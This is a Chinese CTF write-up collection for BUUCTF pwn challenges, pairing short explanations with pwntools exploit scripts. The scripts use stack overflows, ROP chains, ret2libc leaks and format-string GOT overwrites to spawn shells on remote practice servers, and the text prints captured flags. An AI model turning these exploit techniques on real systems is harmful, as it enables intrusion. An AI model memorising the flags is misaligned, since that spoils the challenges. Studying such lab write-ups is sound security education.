buuctf

rip

题目环境为 Ubuntu 18.04,且是 64 位程序,需要考虑栈平衡:glibc 2.27 的 system() 内部使用 movaps 指令,要求调用时 rsp 16 字节对齐,否则会崩溃,所以在后门地址前多放一个单独的 ret gadget 把栈对齐。

lambda部分省略

# rip (64-bit, Ubuntu 18.04): overflow the 0xf-byte buffer, clobber the
# saved rbp, then return through a bare `ret` gadget into the backdoor.
# The extra `ret` keeps rsp 16-byte aligned by the time the backdoor reaches
# system(); this is the "stack balance" the writeup refers to.
ret = 0x0000000000401016   # address of a lone `ret` instruction (alignment gadget)
flag = 0x401186            # presumably the backdoor function that pops a shell

# Layout: buffer (0xf) | saved rbp (8) | return address -> ret | backdoor
payload = b''.join([
    b'a' * 0xf,
    b'b' * 8,
    p64(ret),
    p64(flag),
])
# ru(b'please input')  # syncing on the prompt is not required here
sl(payload)

flag{2b384cc7-6cc9-4d5e-a659-0635a86cdad5}

warmup_csaw_2016

Ubuntu 16.04。程序在 "WOW:" 后直接打印出一个函数地址,该函数会执行 cat flag.txt;读出这个地址,溢出后把返回地址改成它即可。

# warmup_csaw_2016 (64-bit, Ubuntu 16.04): the binary prints the address of
# its cat-flag routine right after "WOW:". Parse it and overwrite the return
# address with it; no alignment gadget is needed on this glibc.
ru(b'WOW:')
leak = r(8)                       # 8 ASCII hex chars (e.g. b'0x40060d'; verify against the banner)
flag = int(leak, 16)
print(hex(flag))

# 64-byte buffer + 8 bytes saved rbp, then the return address.
padding = 0x40 + 8
payload = b'a' * padding + p64(flag)
ru(b'>')
sl(payload)

itr()

ciscn_2019_n_1

栈溢出修改栈上的变量:先算出输入缓冲区到目标变量的偏移(0x2c),再在该位置写入浮点数 11.28125 的 IEEE-754 小端字节表示(0x41348000)。

from pwn import *
import struct
# ciscn_2019_n_1: the comparison target is a float (11.28125) that presumably
# sits 0x2c bytes above the input buffer on the stack. Fill the gap, then
# write the float's IEEE-754 little-endian encoding, 0x41348000, over it.
# p = process('./pwn')
p = remote('node5.buuoj.cn', 28132)

TARGET = 11.28125  # struct.pack('<f', TARGET) == p32(0x41348000)
offset = 0x2c      # distance from the start of the buffer to the float
payload = b'a' * offset + struct.pack('<f', TARGET)
p.sendline(payload)
p.interactive()

pwn1_sctf_2016

Ubuntu 16.04(其他版本也可以)。程序把输入中的每个 I 替换成 you,再用 strcpy 拷回定长缓冲区,替换后长度膨胀从而造成溢出;程序中有后门函数。

# pwn1_sctf_2016 (32-bit): every 'I' in the input becomes "you" (3 bytes)
# before strcpy copies the result into a 0x3c-byte buffer. 20 'I's therefore
# fill the buffer exactly (20 * 3 == 0x3c), and what follows lands on the
# saved ebp and then the return address.
BUF_SIZE = 0x3c
padding = BUF_SIZE // 3           # 20 'I' characters -> 60 bytes after expansion
backdoor = 0x8048f0d

payload = b'I' * padding + b'a' * 4 + p32(backdoor)
sl(payload)

level0

Ubuntu 16.04,read() 栈溢出,程序中有后门函数,覆盖返回地址为后门即可(脚本略)。



flag{16a465c7-eed0-4eda-8fcb-dd5ca85ee50d}

[第五空间2019 决赛]PWN5

格式化字符串漏洞,利用 %n 实现任意地址写。

22
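# [第五空间2019 决赛]PWN5 (32-bit): format-string bug, with the input buffer
# reachable as printf argument #10. Two working approaches:
#   1. Overwrite atoi@GOT with system@PLT. The program's second read goes
#      through atoi(buf), which now runs system(buf), so send "/bin/sh".
#   2. Overwrite the global the password is compared against (0x0804c044,
#      filled with a random value at runtime) with a known constant and then
#      send that constant as the password.
# Only one approach can run per connection: itr() hands the tube to the user
# and the remote side is gone afterwards, so code placed after it would only
# hit a closed tube. Pick one with the flag below instead of running both.
USE_PASSWD_OVERWRITE = False

if not USE_PASSWD_OVERWRITE:
    # Approach 1: hijack atoi -> system. fmtstr_payload builds the %n chain
    # for the write of system@PLT into atoi@GOT at argument offset 10.
    atoi_got = elf.got['atoi']
    system_plt = elf.plt['system']

    payload = fmtstr_payload(10, {atoi_got: system_plt})
    p.recv()
    sl(payload)
    p.recv()
    sl(b'/bin/sh\x00')   # consumed by atoi(), i.e. system("/bin/sh") now

    itr()
else:
    # Approach 2: rewrite the random 4-byte value at 0x0804c044.
    # fmtstr_payload needs context.arch set (i386 here) to size the writes.
    # Hand-rolled equivalent, one %n per byte, which sets the value to
    # 0x10101010 instead of 0x666:
    #   p32(0x0804C044) + p32(0x0804C045) + p32(0x0804C046) + p32(0x0804C047)
    #   + b"%10$n%11$n%12$n%13$n"
    payload = fmtstr_payload(10, {0x0804c044: 0x666})

    p.sendline(payload)

    # atoi() of our input must equal the value we just wrote.
    passwd = str(0x666)
    p.sendline(passwd)
    p.interactive()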

jarvisoj_level2

read() 栈溢出,程序里已经有 system 的调用地址和 "/bin/sh" 字符串,直接 ret2text 构造 system("/bin/sh") 即可。

# jarvisoj_level2 (32-bit): read() overflows a 0x88-byte buffer. The binary
# already contains system and a "/bin/sh" string, so a plain ret2text works.
bin_sh = 0x0804A024
system = 0x08048320

# Layout: buffer (0x88) | saved ebp (4) | ret -> system | fake return
# address for system | first argument -> "/bin/sh".
fake_ret = b'aaaa'
frame = [p32(system), fake_ret, p32(bin_sh)]
payload = b'a' * (0x88 + 4) + b''.join(frame)
sl(payload)

itr()
flag{d935d6a8-444a-4bab-896f-32f177ac0db9}

ciscn_2019_n_8

程序检查一个 int 数组的第 14 个元素(下标 13)是否等于 17,直接写入 14 个 p32(17) 把下标 0 到 13 全部填成 17 即可。

>>> from pwn import *
>>> p = remote('node5.buuoj.cn',29574)
[x] Opening connection to node5.buuoj.cn on port 29574
[x] Opening connection to node5.buuoj.cn on port 29574: Trying 117.21.200.176
[+] Opening connection to node5.buuoj.cn on port 29574: Done
>>> payload = p32(17)*14
>>> p.sendline(payload)
>>> p.interactive()

bjdctf_2020_babystack

程序让用户自己指定读入长度,指定一个超过缓冲区大小的长度即可溢出;程序中有后门函数。

# bjdctf_2020_babystack (64-bit): the program lets the user choose how many
# bytes to read. Ask for 32 and overflow the 0x10-byte name buffer straight
# through the saved rbp into the return address (0x10 + 8 + 8 == 32 bytes).
backdoor = 0x4006e6

ru(b'[+]Please input the length of your name:')
p.sendline(b'32')
ru(b'[+]What\'s u name?')
overflow = b'a' * (0x10 + 8)
p.sendline(overflow + p64(backdoor))

itr()

ciscn_2019_c_1

加密函数用 strlen() 计算长度,而 strlen() 遇到 '\0' 即截断,所以输入以 '\0' 开头就能直接跳出加密循环(后面的 ROP 链不会被改写),然后打 ret2libc 即可。

libc 版本:BUU 远程环境为 64 位 glibc 2.27(Ubuntu 18.04),所以调用 system 前要用 ret gadget 把栈对齐。

# ciscn_2019_c_1 (64-bit, glibc 2.27): two-stage ret2libc. The encrypt
# routine measures the input with strlen(), so a leading NUL byte stops it
# from touching the rest of the payload.
puts_plt = 0x4006e0
puts_got = elf.got['puts']
pop_rdi = 0x0000000000400c83          # pop rdi; ret
ret = 0x00000000004006b9              # lone ret, used for 16-byte stack alignment
reenter = 0x4009a0                    # presumably the encrypt routine; gets us a second input

# 0x50-byte buffer + 8 bytes saved rbp, minus the NUL byte we prepend.
padding = 0x50 + 8 - 1
prefix = b'\0' + b'a' * padding

# Stage 1: leak puts@GOT through puts@PLT, then return into the input routine.
stage1 = [p64(pop_rdi), p64(puts_got), p64(puts_plt), p64(reenter)]
payload = prefix + b''.join(stage1)
ru(b'Input your choice!')
sl(b'1')
ru(b'Input your Plaintext to be encrypted')
sl(payload)
puts_addr = l64()
print(hex(puts_addr))

# Resolve the libc base and the pieces of system("/bin/sh") from the leak.
base_addr = puts_addr - libc.symbols['puts']
system = base_addr + libc.symbols['system']
bin_sh = base_addr + next(libc.search(b'/bin/sh'))

# Stage 2: realign rsp (system() on this glibc requires 16-byte alignment),
# then call system("/bin/sh"). The trailing p64(0) appears to be filler only.
stage2 = [p64(ret), p64(pop_rdi), p64(bin_sh), p64(system), p64(0)]
payload2 = prefix + b''.join(stage2)
ru(b'Input your Plaintext to be encrypted')
sl(payload2)

itr()

收获

反编译出的伪代码要逐行分析,尤其要看清循环的退出条件(本题就是 strlen() 遇 '\0' 截断导致循环提前结束)。

jarvisoj_level2_x64

read()栈溢出

from pwn import *
# jarvisoj_level2_x64 (Ubuntu 16.04): read() overflows a 0x80-byte buffer.
# system and a "/bin/sh" string are already in the binary, so the chain is
# just pop rdi -> "/bin/sh" -> system. No alignment gadget is needed here.
p = remote('node5.buuoj.cn', 26824)

system = 0x4004c0
bin_sh = 0x600A90
rdi = 0x00000000004006b3              # pop rdi; ret

# Layout: buffer (0x80) | saved rbp (8) | ROP chain
chain = [p64(rdi), p64(bin_sh), p64(system)]
payload = b'a' * (0x80 + 8) + b''.join(chain)

p.sendline(payload)
p.interactive()